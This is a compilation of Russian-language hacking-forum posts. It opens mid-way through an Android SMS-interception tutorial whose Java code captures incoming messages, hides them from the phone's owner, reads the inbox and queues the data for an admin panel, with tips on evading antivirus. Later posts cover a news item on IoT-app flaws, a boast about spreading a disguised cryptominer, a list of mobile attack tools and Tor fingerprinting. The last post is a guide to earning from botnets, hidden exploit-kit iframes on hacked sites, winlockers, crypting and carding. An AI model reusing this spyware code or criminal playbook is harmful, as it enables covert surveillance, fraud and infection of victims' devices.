intent1.putExtra("text", sms.Text); intent1.putExtra("date", sms.RecieveDate); context.startService(intent1); // Запуск сервиса обработки сообщения. abortBroadcast(); // функция для отмены передачи этого события дальше приложениям. } private String getMessageFromSMSs(SmsMessage[] sms) { String str=""; for(SmsMessage message:sms) { str += message.getMessageBody().toString(); } return str; } public class Sms{ public String SenderId; public String Text; public Date RecieveDate; public int Status; } } Вот, основной класс который занимается перехватом смс. Кажется, можно сделать глоток пивка и расслабиться. Но нет, это не будет работать в связи с тем, что нам еще нужно сделать класс, для обработки смс сообщения. По-сути, сейчас мы сделали только перехват. Сразу возникает вопрос: “А почему нельзя все сделать в одном месте?” Проблема кроется во времени обработки. Обработка событий не может быть долгой. И времени хватает только на чтение данных и передачу их сервису. Intent intent1 = new Intent(context, SMSService.class); // подготовка Запуска сервиса обработки сообщения. intent1.putExtra("phone", sms.SenderId); intent1.putExtra("text", sms.Text); intent1.putExtra("date", sms.RecieveDate); context.startService(intent1); // Запуск сервиса обработки сообщения. Что и делает выше описанный код. Мы говорим какой класс запустить (он обязательно должен быть зарегистрирован как сервис) и передаем параметры. public class SMSService extends Service { @Override public IBinder onBind(Intent intent) { return null; } @Override public int onStartCommand(Intent intent, int flags, int startId) { String sms_tel = intent.getExtras().getString("phone"); String sms_body = intent.getExtras().getString("text"); String sms_date = intent.getExtras().getString("date"); //обрабатываем данные и если надо отсылаем в админку. return START_STICKY; } } Дабы вышеописанный метод работал, нас нужно объявить в манифесте приложения. Чтобы android знал, что мы хотим делать. Но учтите, что при установке, пользователь увидит это в разрешениях приложения. <uses-permission android:name="android.permission.RECEIVE_SMS" /> <receiver android:name=".SMSMonitor"> <intent-filter android:priority="100"> <action android:name="android.provider.Telephony.SMS_RECEIVED" /> </intent-filter> </receiver> Дает право нам перехватывать смс. Есть хороший параметр приоритет, тут значение может быть от 1 до 999. Я рекомендую использовать от 100, но не сильно высоко. На этот параметр может ругаться антивирус. Если появился детект, можете искать его тут. Чем выше значение тем вы раньше будете стоять на обработку в очереди событий. <service android:name=".SMSService" /> //нужно для того,чтобы мы смогли запускать класс как сервис. Собираем, проверяем, все работает. Ура. Чтение сохранённых смс String INBOX = "content://sms/inbox"; //String SENT = "content://sms/sent"; //String DRAFT = "content://sms/draft"; Cursor cursor = cnt.getContentResolver().query(Uri.parse(INBOX), null, null, null, null); if (cursor.moveToFirst()) { do { for(int idx=0;idx<cursor.getColumnCount();idx++) { if(cursor.getColumnName(idx).toString().equalsIgnoreCase(Config.szAddress)){ // cursor.getString(idx)// номер телефона } if(cursor.getColumnName(idx).toString().equalsIgnoreCase(Config.szBody)){ // cursor.getString(idx) // сообщение } if(cursor.getColumnName(idx).toString().equalsIgnoreCase(Config.szDate)){ // cursor.getString(idx) // дата сообщения } } } while (cursor.moveToNext()); } else { // нету смс } Для работы данного способа требуется разрешение <uses-permission android:name="android.permission.READ_SMS" /> Прячем “плохие” сообщения Я еще не объяснил где происходит удаление смс. И поэтому перейдем к этому вопросу. Тем более пива у вас уже должно заканчиваться, если конечно вы не ящик взяли ? Самая главная функция abortBroadcast(); . Она говорит системе, чтобы она не передавала сообещение другим обработчикам включая стандартный смс менеджер от android‘a. Поэтому лучше иметь приоритет выше чем все приложения такого типа. Так же эта функция рано или поздно, станет вашим детектом. Но есть способы обойти это. Удаление смс вручную, после обработки. Но тут вы должны будете приглушить звук смс, для того чтобы пользователь ни чего не заподозрил. Удаление смс из очереди. (не пользовался) P.S. Ну и на последок, данный способ будет работать на android‘е 2.х. От версии 4.4 и выше, он работать не будет (может только перехват, без отмены очереди). Там требуются другие методы. Но мы и это пройдем. Что же делать? Я опишу два способа, но первый будет в качестве примера, а второй покажет Вам, как делать правильно. Метод плоских файлов Дописывать в конец файла, а при отправке очищать файл. Структура файла: {json}\n {json}\n ......... {json}\n Код чтения всего файла: File fl = new File(filePath); FileInputStream fin = new FileInputStream(fl); String ret = convertStreamToString(fin); fin.close(); try { FileWriter fw = new FileWriter(filePath, true); fw.write(Value + "\n"); fw.close(); } catch (IOException ioe) { } Тут ничего сложного: читай, пиши. Есть одно “Но”. Мы работаем в потоках, и может случиться одновременная запись и удаление, а это надо контролировать. Но мы же спецы, нам надо сделать чтобы было круто. И мы переходим к базам данных. Mysqli или как хранить данные по ФенШую Мы рассмотрим работу с базой данных на примере чтения и записи. У нас простая табличка, где будут IDи StringJSON, которую после отправки мы будем очищать. public class KNOCKERDatabase extends SQLiteOpenHelper { private static final int DATABASE_VERSION = 1; private static final String DATABASE_NAME = "knocker"; private static final String TABLE_KNOCKER = "knocker"; private static final String KEY_ID = "id"; private static final String KEY_JSON = "stringjson"; public KNOCKERDatabase(Context context) { super(context, DATABASE_NAME, null, DATABASE_VERSION); } @Override public void onCreate(SQLiteDatabase db) { String CREATE_TABLE = "CREATE TABLE " + TABLE_KNOCKER + "(" + KEY_ID + " INTEGER PRIMARY KEY," + KEY_JSON + " TEXT," + ")"; db.execSQL(CREATE_TABLE); } void addJson(String json) { SQLiteDatabase db = this.getWritableDatabase(); ContentValues values = new ContentValues(); values.put(KEY_JSON, json); db.insert(TABLE_KNOCKER, null, values); db.close(); } public List<String> getAllJson() { List<String> jsons = new ArrayList<String>(); String selectQuery = "SELECT * FROM " + TABLE_KNOCKER; SQLiteDatabase db = this.getWritableDatabase(); Cursor cursor = db.rawQuery(selectQuery, null); if (cursor.moveToFirst()) { do { jsons.add(cursor.getString(1)); } while (cursor.moveToNext()); } return jsons; } public void deleteRows(String num) { SQLiteDatabase db = this.getWritableDatabase(); String del ="delete from " + TABLE_KNOCKER + " where " + KEY_ID + " in (select " + KEY_ID + " from " + TABLE_KNOCKER + " order by _id LIMIT " + num + ");"; db.execSQL(del); db.close(); } public int getCount() { String countQuery = "SELECT * FROM " + TABLE_KNOCKER; SQLiteDatabase db = this.getReadableDatabase(); Cursor cursor = db.rawQuery(countQuery, null); cursor.close(); return cursor.getCount(); } } Теперь можно перейти к практике, как это использовать. Шаг первый. Запись. KNOCKERDatabase db = new KNOCKERDatabase(context); db.addJson(DATA); Где DATA – это запрос для отправки на сервер.Шаг второй. Чтение. KNOCKERDatabase db = new KNOCKERDatabase(this); List<String> jsons = db.getAllJson(); После прочтения записей, считаем их количество (через getCount), чтобы не удалить лишнее и избавляемся от них через deleteRows.
  9. Исследователи безопасности из компании Rapid7 проанализировали Android-приложения для управления IoT-устройствами Wink Hub 2 и Insteon Hub. В ходе исследования было выявлено, что оба приложения хранят конфиденциальные учетные данные в файлах конфигурации в незашифрованном виде. Как правило, Android-приложения не имеют доступа к файлам других приложений (за исключением системных служб со специальными привилегиями). Однако существуют способы, с помощью которых злоумышленники могут получить доступ к данным, поэтому Android предоставляет встроенное безопасное хранилище ключей для хранения конфиденциальной информации. Существуют различные методы шифрования учетных данных в хранилище, но некоторые разработчики по непонятным причинам не используют эти механизмы. Данные приложений могут быть легко извлечены из утерянных или украденных телефонов, не имеющих сильную парольную защиту, или не использующих шифрование. По словам исследователей из Rapid7, для этого не требуются особые навыки - только Google и 45 минут времени. Как выяснили эксперты, Android-приложение для управления хабом Wink Hub 2 хранило в незащищенном виде токены доступа к OAuth, используемые серверами Wink для отслеживания сессий авторизованных пользователей. Токены позволяют мобильным приложениям отправлять команды на устройство Wink Hub через облачный сервис компании. Как отметили исследователи, даже когда были сгенерированы новые токены, старые все еще оставались действительными. Таким образом, даже если пользователь попытался бы уменьшить риски после потери смартфона, изменив пароли в Wink, токены OAuth, хранящиеся на их устройствах, оставались бы актуальными. По словам исследователя, Wink уже выпустила обновление для своего приложения и планирует исправить проблему с токенами в ближайшем будущем.Еще одна уязвимость была обнаружена в устройствах Insteon. Компания выпускает различные «умные» переключатели, лампочки, розетки, датчики, дверные замки, камеры и другие IoT-устройства. Гаджеты обмениваются сигналами в проприетарном радиочастотном диапазоне на частоте 915 МГц. По словам исследователей, из-за отсутствия шифрования злоумышленники, находящиеся в коммуникационном диапазоне, могут перехватить такой сигнал, а затем повторно использовать его для получения контроля над устройством. В ходе эксперимента исследователям безопасности удалось перехватить и воспроизвести сигнал Insteon Garage Door Control Kit и открыть дверь гаража. Учетные данные в приложении для управления хабом Insteon также хранились в незашифрованном виде, в том числе логины/пароли для учетных записей пользователей и непосредственного управления устройством-хабом через локальную сеть. Исследователи сообщили компании о наличии уязвимостей, однако Insteon пока не предприняла никаких действий по их устранению. Wink – компания, занимающаяся разработкой программных и аппаратных продуктов, которые можно подключить к домашним IoT-устройствам и управлять ими с помощью пользовательского интерфейса. Insteon - дочернее подразделение компании Smartlabs, занимающееся разработкой технологии домашней автоматизации, которая позволяет переключателям света, лампам, термостатам, датчикам движения и другим электрическим устройствам взаимодействовать друг с другом через линии электропередач, радиочастотную связь или то и другое.
  10. Начну с того, что это чернуха (ст 273 ук рф), и как большинство тёмных дел, она приносит баснословные профиты (на пике у меня было 2700 баксов в НЕДЕЛЮ). Дада, продолжи заниматься этим, я бы давно был на островах и меня бы мало чего заботило, но во всём нужно знать меру, особенно в тёмных делах. Как же я достиг такого профита? Изи изи рил ток синк эбаут ит. Нужен качественный билд и охуевшая криптовка, которую палят максимум 4 антивируса и то ноунэймовских. И нужны хорошие познания СИ. Я распространял свой майнер под видом программы для заработка на буксах. Была мысль связаться с кодером и сделать РЕАЛЬНО программу по заработку, но в которую будет вшит майнер. К примеру, в прогу транслировать задания буксов, подать это под соусом удобности и конечно же вшить туда майнер. НО заходило итак всё отлично, я не парился. Недели две мне лилось по 2000 баксов в неделю, это по 16к в день. Половину из этих денег я прогулял, потратил на подарки родителям, а остальную часть пустил в дело. Те воспоминания в моей голове выражаются улётной безбашенностью и лёгкими бабками, осталось только тёлок и наркоту подвезти (которую не употребляю и вам не советую). Как и всё хорошее, такое не может продолжаться вечно. Будь я дураком - я бы не остановился, делал бы деньги и в итоге отъехал на кичу. Масштабы были просто огромными и возможный срок, думаю, тоже. Если вы хотите влиться в эту тему, то моё очень важное наставление - не перейдите ту черту, за которую заходить нельзя. Срубили бабок - обелили их и забыли про майнинг. Кстати да, я работал по аудитории РФ, потому что в Европе люди более прошаренные в этом плане. И это добавляет еще более рисков. Используйте хорошую криптовку, не жалейте на нее денег, при грамотном подходе всё моментально окупится. P.S: я не криптую, не делаю билды и не даю ничьи контакты. С этим делом я завязал, так что извиняйте
  11. Хотелось поделится с вами, читателями набором хакерских утилит для Android и iOS устройств. Не забывайте, что для этих программ вам нужно прошить ваше устройство на Root (Android) и JailBreak (iOS). Сетевые сканеры: PIPS Незаметный смартфон, который в отличие от ноутбука легко помещается в карман и никогда не вызывает подозрений, может быть полезен для исследования сети. Выше мы уже сказали, как можно установить Nmap, но есть еще один вариант. PIPS — это специально адаптированный под Android, хотя и неофициальный порт сканера Nmap. А значит, ты сможешь быстро найти активные устройства в сети, определить их ОС с помощью опций по fingerprinting’у, провести сканирование портов — короче говоря, сделать все, на что способен Nmap. Fing С использованием Nmap’а, несмотря на всю его мощь, есть две проблемы. Во-первых, параметры для сканирования передаются через ключи для запуска, которые надо не только знать, но еще и суметь ввести с неудобной мобильной клавиатуры. А во-вторых, результаты сканирования в консольном выводе не такие наглядные, как того хотелось бы. Этих недостатков лишен сканнер Fing, который очень быстро сканирует сеть, делает fingerprinting, после чего в понятной форме выводит список всех доступных устройств, разделяя их по типам (роутер, десктоп, iPhone и так далее). При этом по каждому хосту можно быстро посмотреть список открытых портов. Причем прямо отсюда можно подключиться, скажем, к FTP, используя установленный в системе FTP-клиент, — очень удобно. NetAudit Когда речь идет об анализе конкретного хоста, незаменимой может оказаться утилита NetAudit. Она работает на любом Android-устройстве (даже нерутованном) и позволяет не только быстро определить устройства в сети, но и исследовать их с помощью большой fingerprinting-базы для определения операционной системы, а также CMS-систем, используемых на веб-сервере. Сейчас в базе более 3000 цифровых отпечатков. Net Tools Если же нужно, напротив, работать на уровне ниже и тщательно исследовать работу сети, то здесь не обойтись без Net Tools. Это незаменимый в работе системного администратора набор утилит, позволяющий полностью продиагностировать работу сети, к которой подключено устройство. Пакет содержит более 15 различного рода программ, таких как ping, traceroute, arp, dns, netstat, route. Манипуляции с трафиком: FaceNiff Если говорить о боевых приложениях для Android, то одним из самых нашумевших является FaceNiff, реализующий перехват и внедрение в перехваченные веб-сессии. Скачав APK-пакет с программой, можно практически на любом Android-смартфоне запустить этот хек-инструмент и, подключившись к беспроводной сети, перехватывать аккаунты самых разных сервисов: Facebook, Twitter, «ВКонтакте» и так далее — всего более десяти. Угон сессии осуществляется средствами применения атаки ARP spoofing, но атака возможна только на незащищенных соединениях (вклиниваться в SSL-трафик FaceNiff не умеет). Чтобы сдержать поток скрипткидисов, автор ограничил максимальное число сессий тремя — дальше нужно обратиться к разработчику за специальным активационным кодом. DroidSheep Если создатель FaceNiff хочет за использование денежку, то DroidSheep — это полностью бесплатный инструмент с тем же функционалом. Правда, на официальном сайте ты не найдешь дистрибутива (это связано с суровыми законами Германии по части security-утилит), но его без проблем можно найти в Сети. Основная задача утилиты — перехват пользовательских веб-сессий популярных социальных сетей, реализованный с помощью все того же ARP Spoofing’а. А вот с безопасными подключениями беда: как и FaceNiff, DroidSheep наотрез отказывается работать с HTTPS-протоколом. Network Spoofer Эта утилита также демонстрирует небезопасность открытых беспроводных сетей, но несколько в другой плоскости. Она не перехватывает пользовательские сессии, но позволяет с помощью спуфинг-атаки пропускать HTTP-трафик через себя, выполняя с ним заданные манипуляции. Начиная от обычных шалостей (заменить все картинки на сайте троллфейсами, перевернуть все изображения или, скажем, подменив выдачу Google) и заканчивая фишинговыми атаками, когда пользователю подсовываются фейковые страницы таких популярных сервисов, как facebook.com, linkedin.com, vkontakte.ru и многих других. Anti (Android Network Toolkit by zImperium LTD) Если спросить, какая хак-утилита для Android наиболее мощная, то у Anti, пожалуй, конкурентов нет. Это настоящий хакерский комбайн. Основная задача программы — сканирование сетевого периметра. Далее в бой вступают различные модули, с помощью которых реализован целый арсенал: это и прослушка трафика, и выполнение MITM-атак, и эксплуатация найденных уязвимостей. Правда, есть и свои минусы. Первое, что бросается в глаза, — эксплуатация уязвимостей производится лишь с центрального сервера программы, который находится в интернете, вследствие чего о целях, не имеющих внешний IP-адрес, можно забыть. Туннелирование трафика: Total Commander Хорошо известный файловый менеджер теперь и на смартфонах! Как и в настольной версии, тут предусмотрена система плагинов для подключения к различным сетевым директориям, а также канонический двухпанельный режим — особенно удобно на планшетах. SSH Tunnel Хорошо, но как обеспечить безопасность своих данных, которые передаются в открытой беспроводной сети? Помимо VPN, который Android поддерживает из коробки, можно поднять SSH-туннель. Для этого есть замечательная утилита SSH Tunnel, которая позволяет завернуть через удаленный SSH-сервер трафик выбранных приложений или всей системы в целом. ProxyDroid Часто бывает необходимо пустить трафик через прокси или сокс, и в этом случае выручит ProxyDroid. Все просто: выбираешь, трафик каких приложений нужно туннелировать, и указываешь прокси (поддерживаются HTTP/HTTPS/SOCKS4/SOCKS5). Если требуется авторизация, то ProxyDroid это также поддерживает. К слову, конфигурацию можно забиндить на определенную беспроводную сеть, сделав разные настройки для каждой из них. Беспроводные сети: Wifi Analyzer Встроенный менеджер беспроводных сетей не отличается информативностью. Если нужно быстро получить полную картину о находящихся рядом точках доступа, то утилита Wifi Analyzer — отличный выбор. Она не только покажет все находящиеся рядом точки доступа, но и отобразит канал, на котором они работают, их MAC-адрес и, что важнее всего, используемый тип шифрования (увидев заветные буквы «WEP», можно считать, что доступ в защищенную сеть обеспечен). Помимо этого утилита идеально подойдет, если нужно найти, где физически находится нужная точка доступа, благодаря наглядному индикатору уровня сигнала. WiFiKill Эта утилита, как заявляет ее разработчик, может быть полезна, когда беспроводная сеть под завязку забита клиентами, которые используют весь канал, а именно в этот момент нужен хороший коннект и стабильная связь. WiFiKill позволяет отключить клиентов от интернета как выборочно, так и по определенному критерию (к примеру, возможно постебаться над всеми яблочниками). Программа всего-навсего выполняет атаку ARP spoofing и перенаправляет всех клиентов на самих себя. Этот алгоритм до глупости просто реализован на базе iptables. Такая вот панель управления для беспроводных сетей фастфуда. Аудит веб-приложений: HTTP Query Builder Манипулировать HTTP-запросами с компьютера — плевое дело, для этого есть огромное количество утилит и плагинов для браузеров. В случае со смартфоном все немного сложнее. Отправить кастомный HTTP-запрос с нужными тебе параметрами, например нужной cookie или измененным User-Agent, поможет HTTP Query Builder. Результат выполнения запроса будет отображен в стандартном браузере. AnDOSid Наверняка ты слышал о такой нашумевшей программе вывода из строя веб-серверов, как Slowloris. Принцип ее действия: создать и удерживать максимальное количество подключений с удаленным веб-сервером, таким образом не давая подключиться к нему новым клиентам. Так вот, AnDOSid — аналог Slowloris прямо в Android-девайсе! Скажу по секрету, двухсот подключений достаточно, чтобы обеспечить нестабильную работу каждому четвертому веб-сайту под управлением веб-сервера Apache. И все это — с твоего телефона! iOS: Не менее популярна среди разработчиков security-утилит платформа iOS. Но если в случае с Android права root’а были нужны только для некоторых приложений, то на устройствах от Apple джейлбрейк обязателен почти всегда. К счастью, даже для последней прошивки iДевайсов уже есть тулза для джейлбрейка. Вместе с полным доступом ты еще получаешь и альтернативный менеджер приложений Cydia, в котором уже собраны многие утилиты. Работа с системой: MobileTerminal Первое, с чего хочется начать, — это установка терминала. По понятным причинам в стандартной поставке мобильной ОС его нет, но он нам понадобится, чтобы запускать консольные утилиты, о которых мы далее будем говорить. Лучшей реализацией эмулятора терминала является MobileTerminal — он поддерживает сразу несколько терминалов, жесты для управления (например, для передачи Control-C) и вообще впечатляет своей продуманностью. Перехват данных: Pirni & Pirni Pro Теперь, когда доступ к консоли есть, можно попробовать утилиты. Начнем с Pirni, вошедшей в историю как полноценный сниффер для iOS. К сожалению, конструктивно ограниченный модуль Wi-Fi, встроенный в устройство, невозможно перевести в promiscious-режим, необходимый для нормального перехвата данных. Так что для перехвата данных используется классический ARP-спуфинг, с помощью которого весь трафик пропускается через само устройство. Стандартная версия утилиты запускается из консоли, где помимо параметров MITM-атаки указывается имя PCAP-файла, в который логируется весь трафик. У утилиты есть более продвинутая версия — Pirni Pro, которая может похвастаться графическим интерфейсом. Причем она умеет на лету парсить HTTP-трафик и даже автоматически вытаскивать оттуда интересные данные (к примеру, логины-пароли), используя для этого регулярные выражения, которые задаются в настройках. Ettercap-NG Трудно поверить, но этот сложнейший инструмент для реализации MITM-атак все-таки портировали под iOS. После колоссальной работы получилось сделать полноценный мобильный порт. Чтобы избавить себя от танцев с бубном вокруг зависимостей во время самостоятельной компиляции, лучше установить уже собранный пакет, используя Cydia, предварительно добавив в качестве источника данных theworm.altervista.org/cydia (репозиторий TWRepo). В комплекте идет и утилита etterlog, которая помогает извлечь из собранного дампа трафика различного рода полезную информацию (к примеру, аккаунты доступа к FTP). Сетевые сканеры: Scany Какой программой пользуется любой пентестер в любой точке планеты независимо от целей и задач? Сетевым сканером. И в случае с iOS это, скорее всего, будет мощнейший тулкит Scany. Благодаря набору встроенных утилит можно быстро получить подробную картину о сетевых устройствах и, к примеру, открытых портах. Помимо этого пакет включает в себя утилиты тестирования сети, такие как ping, traceroute, nslookup. Fing Впрочем, многие отдают предпочтение Fing’у. Сканер имеет достаточно простой и ограниченный функционал, но его вполне хватит для первого знакомства с сетью, скажем, кафетерия . В результатах отображается информация о доступных сервисах на удаленных машинах, MAC-адреса и имена хостов, подключенных к сканируемой сети. Nikto Казалось бы, про Nikto все забыли, но почему? Ведь этот веб-сканер уязвимостей, написанный на скрипт-языке (а именно на Perl), ты легко сможешь установить через Cydia. А это значит, что ты без особого труда сможешь запустить его на своем джейлбрейкнутом устройстве из терминала. Nikto с радостью предоставит тебе дополнительную информацию по испытуемому веб-ресурсу. К тому же ты своими руками можешь добавить в его базу данных знаний собственные сигнатуры для поиска. sqlmap Этот мощный инструмент для автоматической эксплуатации SQL-уязвимостей написан на Python, а значит, установив интерпретатор, им без проблем можно пользоваться прямо с мобильного устройства. Восстановление паролей: Hydra Легендарная программа, помогающая «вспомнить» пароль миллионам хакеров по всему миру была портирована под iOS. Теперь прямо с iPhone’а возможен перебор паролей к таким сервисам, как HTTP, FTP, TELNET, SSH, SMB, VNC, SMTP, POP3 и многим другим. Правда, для более эффективной атаки лучше запастись хорошими словарями для брутфорса.
  12. Доктор Нил Кравец, сам себя называющий специалистом по безопасности и судебно-медицинской экспертизе, воспользовался свом личным блогом, чтобы опубликовать статью о трех основных уязвимостях в браузере Tor. Сначала прочитав эту статью, можно было бы задаться вопросом, почему доктор Кравец использовал свой личный блог вместо проверенных каналов. Как оказалось это было сделано специально, для исследования, так как: «официальные» каналы редко вызывают резонанс и публикуют подобные статьи. Основываясь на его статье, в которой изложены и указаны три "уязвимости" в Tor браузере, можно быть уверенным в отсутствии связи между Tor Project и (по крайней мере, в данном случае) службой безопасности обнаруживающей уязвимости. Пробегаясь по некоторым из его постов стало понятно, что у исследователя были сложные отношения с проектом Tor и самим браузером. Но также он показал, что он не был опытен в мире анонимности и конфиденциальности, в Интернете. Он рассказал о трудностях, с которыми он столкнулся, когда пытался связаться с кем-либо (кроме официальных лиц в Twitter) из Tor Project. Предложения об анонимности, изложенные доктором Краветцем в разделе «отпечатки пальцев / fingerprint» (подразумеваются цифровые отпечатки). Краткое описание: Tor браузер, в первую очередь, защищает Ваш IP-адрес, от использования его в качестве идентификации вашей личности. Отпечаток переходит в незначительную некритическую утечку данных, которая со временем может выделить пользователя среди массы других, даже если все они выглядят одинаково. Даже Mozilla работавшая над Tor-like приняла антитеррористические меры в самом Firefox. Изучая безопасность Хосе Карлос Норте смог объяснить эту терминологию намного лучше, чем я: Первая проблема с отпечатками, описанная доктором Кравецем, была в размере окна и экрана. Поскольку компьютеры и мобильные устройства имеют экраны разных размеров, браузер Tor сообщает вымешленное значение: что экран и окна имеют одинаковый размер. Если размер окна и размер экрана совпадают JavaScript может сразу обнаружить TOR-Browser. Идея доктора Кравеца в том, чтобы Tor всегда сообщал, что клиент использует экран с размером больше, чем у открытого окна. Вторая проблема - это проблема с экраном, которая повлияла только на пользователей MacOS. (Или, в основном на MacOS.) Браузер иногда неправильно вычислял размера экрана и, таким образом, пересчитавал стандартный размер окна на - 1000 × 1000. Если экран меньше этого, тогда браузер выберет широкий экран, то есть кратно 200 пикселей, а высота, кратная 100 пиксели. Он объяснил, что этот вопрос был некомпетентным, но ситуацию исправили при удалении док-станции. И поэтому исследователь объяснил, браузер Tor который пользователь запускал в Mac OS имел изьяны. И третья проблема - с полосой прокрутки. Используя разные операционные системы, мы получаем разную ширину полосы прокрутки. Браузер Tor создает иллюзию того,что все выглядят едино в соотношении размер экрана/размер окна. Но если отображаются полосы прокрутки, размер видимого экрана можно вычесть от размера окна, чтобы найти толщину полосы прокрутки. Благодаря этим исследованиям мы узнали: Tor в Mac OS использует 15 пикселей размера окна. Tor в современных Windows использует 17 пикселей. Tor на Linux имеет более спецефическую идентификацию. «Размер зависит от варианта Linux и настольной платформы, например "Gnome" или "KDE". "10 пикселей на Linux Mint с Gtk-3.0. 13 для Ubuntu 16.04 с Gnome. Неофициальные браузеры Tor для мобильных устройств используют нулевые пиксели.
  13. Секрет бизнеса заключается в знании того, чего не знают другие. Аристотель Онассис Мораль: если ты будешь заниматься тем же, чем и все - ты будешь зарабатывать столько же, сколько и все. Но если ты будешь думать сам, искать решения, соображать - ты будешь зарабатывать столько, сколько зарабатывают немногие. В мире, 5% населения используют 95% ресурсов, добываемых всем человечеством, а остальные 95% довольствуются оставшимися 5 процентами. Взлом аккаунтов, сайтов под заказ Наименее прибыльный и наименее интересный вид бизнеса. Это как фриланс в хаке. Большинство новичков думает, что деньги в хакерстве зарабатываются именно взломом под заказ. На самом деле это не так. Ботнеты Ботнет - это сеть зараженных компов (зомби-компьютеры), которую хакеры используют по своему усмотрению. На зомби-компьютерах хакерами установлен специальный софт, который поддерживает связь с сервером хакера, ожидая от него новой команды. Хакер, при помощи панели управления ботнетом, может, например, задать команду "ддосить такой-то сайт". Зомби-компьютеры прочитают этот "приказ", и начнут посылать на атакуемый сайт множество бесполезных пакетов данных, и сайт ляжет. В ботнетах насчитываются тысячи, десятки тысяч, и даже миллионы зомби-компьютеров. Поскольку на зараженных компах есть "иммунитет" - это антивирусное ПО, хакерские боты с компьютеров постепенно отваливаются ("палятся" ), и ботнет нуждается в постоянном пополнении. Компы юзеров заражаются через сайты, на которых установлены ифреймы со связками эксплоитов. Владелец сайта может не подозревать, что его сайт взломали, и он используется хакерами для заражения компьютеров посетителей. Хакеры обычно обслуживают взломанные сайты через веб-шелл: это скрипт, который заливается на сайт, через который можно взаимодействовать с файлами и базой данных сайта. На данный момент широко используется шелл под названием WSO (Web Shell by oRb). Раньше пользовался популярностью c99shell. Разберем по полочкам, что сколько приносит прибыли. Iframe-трафик, шеллы. На веб-страницы взломанных сайтов, хакеры вставляют специальный html-тег <iframe src="адрес_связки_эксплоитов">. Это совершенно законный тег, предусмотренный языком html. Фрейм делается невидимым (размерами 1х1 пиксель, либо прячется за визуальные пределы страницы). В нем загружается связка эксплоитов, через которую на комп посетителя зараженной веб-страницы, попадает вредоносное ПО. Сайты хакерами ломаются мелкие массово, либо крупные вручную. Цена на ифрейм-трафик 5-15$ за 1к посетителей. Таким образом, с посещалки 20к, можно заработать 100-300$ в день. Можно продавать взломанные сайты (шеллы), но это получается гораздо дешевле, чем трафик. Кроме того, никто не даст гарантии, что купив шелл, его не удалят админы на следующий день. Еще побочный эффект в том, что ифрейм на сайте может палиться популярными антивирусниками, что могут заметить админы сайта, и удалить ифрейм, либо на сайте сильно упадет посещалка. Также часто спаливается домен связки - поэтому их нужно часто заменять. Палится домен или нет, проверяется при помощи специальных АВ-чек-сервисов (см. ниже). Чтобы заниматься iframe-трафиком, необходимо уметь и знать: устройство веб-сайтов; html, php, javascript; уметь ломать сайты (искать крупные сайты, а также уязвимости в них). Загрузки (лоады, инсталлы). Новички, которые впервые видят это слово, думают что это заработок на файлообменниках На самом деле, загрузки - это процес закачки хакерского софта на компьютер жертвы и запуск его. Чтобы выполнять загрузки, нужно обладать трафиком и связкой. Трафик можно покупать у трафферов, либо добывать самому (см ниже). Связка берется в аренду. Сейчас эффективность связок очень упала, по сравнению с предыдущими годами. Суммарный пробив связок 3-12%. Это значит, что из 100 посетителей, перешевших на зараженный сайт, заразятся всего 3-12 человек. Так вот количество лоадов - это именно число "пробитых" компов. Количество загрузок измеряется в тысячах (к). На рынке цены - 50-200$ за 1к загрузок. Имея 100к трафика в день, можно совершить 5-10к загрузок, что принесет 250 - 2000$ в день. Цены зависят от тематики трафика (бизнес, новости, адалт, микс) и географии (больше всего ценится трафик развитых стран - Европы и США, поскольку там самый платежеспособный народ). Чтобы заниматься загрузками, необходимо иметь капитал, позволяющий арендовать либо покупать связку и трафик. Либо такой трафик, который может обеспечить аренду связки. Ссылка: Объявления по трафику и загрузкам (посмотрите цены, кто что и за сколько продает). Подмена выдачи. Это один из видов бота, который устанавливается на компы жертвы. Принцип действия таков: юезр зараженного компа ищет что-либо в гугле, например "купить холодильник". Бот подмены перехватывает страницу результатов поиска, и домешивает туда свои результаты. В итоге юзер покупает холодильник у селлера, который рекламируется с помощью подмены выдачи. Т.е. это принудительное поднятие сайта в поисковых результатах. Партнерки, которые работают с подменами называются PPC (pay-per-click). Приносит доход - 100-500$ в день (!!!) с 1 к зараженных компов. Это значит, что достаточно один раз заразить компы, после чего они долгое время будут приносить доход! Прибыль для хак-команды, полученная в результате подмены выдачи - исчисляется сотнями тысяч долларов в месяц. Но здесь также расходы бешенные - траф, загрузки, аренда защищенных серваков, способных принимать десятки и сотни тысяч трафика в сутки, обходится в тысячи баксов в день. Что необходимо иметь, чтоб заниматься подменой выдачи: нужен специальный софт, который конвертирует загрузки в прибыль. Софт разрабатывается продвинутыми хак-командами. Локер ("locker", "winlocker") - бот-попрошайка, который блокирует операционную систему, требуя отправить немного денег хацкеру (через SMS, а также через ваучеры пополнения счетов). Прибыль от локера зависит от платежеспособности контингента, под который он прогружается. Например в странах СНГ люди бедные, поэтому им проще переустановить винду, чем платить мошеннику. А в европах-пиндостанах могут повестись, хотя там тоже не дураки. Вообще это грязный вид бизнеса, толстый подход к заработку денег, компьютерный гоп-стоп. DDoS. Спам. Обслуживающие сервисы: Крипт. Софтина, которая прогружается на компы, не должна палиться антивирусниками, поэтому должна криптоваться. Один крипт стоит 10-20 баксов, живет недолго (в зависимости от того, на сколько компов загружается), около 1-5 дней. Криптовальщики зарабатывают 100-200$ в день. Все зависит от заказов, насколько хороший крипт. Проверка на АВ. Существует сервисы (реклама не оплачена, поэтому промолчу!), которые анонимно прогоняют ваш файл, домен через 30+ существующих антивирусников, чтобы выяснить, какими палится. Сервис стоит 20-25 баксов в месяц, либо 15 центов за одну проверку. Клиентов у таких сервисов дохренища. Рег доменов пачками. На связках и ТДСках часто палятся домены, поэтому требуется их частая замена. Обфускация кода. Ифрейм тоже часто палится, поэтому нужно перекриптовывать. Ифрейм-сервисы. Сервисы, которые автоматически устанавливают iframe на сайты, чтоб вручную не париться. Эксплоит-паки. На рынке существует много разных решений, выбор между ними колеблется в зависимости от цены, палибельности и пробива. Известные связки: BlackHole (БХ), Sakura, GrandSoft, Nuclear. Объявления: крипт, связки, софт для ботнета. Это общеизвестные темы (см. полный список). Но каждый может сам придумать свой способ, как вытрясти бабло со взломанных компов. Если тема стоящая, хакер собирает команду, разрабатывают ПО, криптуют его, и прогружают на компы. Кардинг и мошенничество Целенаправленный пиздинг денег. Наиболее жестко преследуется по закону, причем виновники разыскиваются через интерпол. Существуют 2 вида: Кардинг - деньги крадутся с кредитных карт и банковских счетов. Угон денег из платежных систем. Я новичок, как мне присоединиться? Допустим, ты - недавно научился пользоваться компом, либо у тебя есть небольшие познания кодинга на Дельфи. Ты стоишь на пороге в мир гигантского бабла, но ты ничего не умеешь, боишься, и без понятия за что тебе взяться. Что делать? 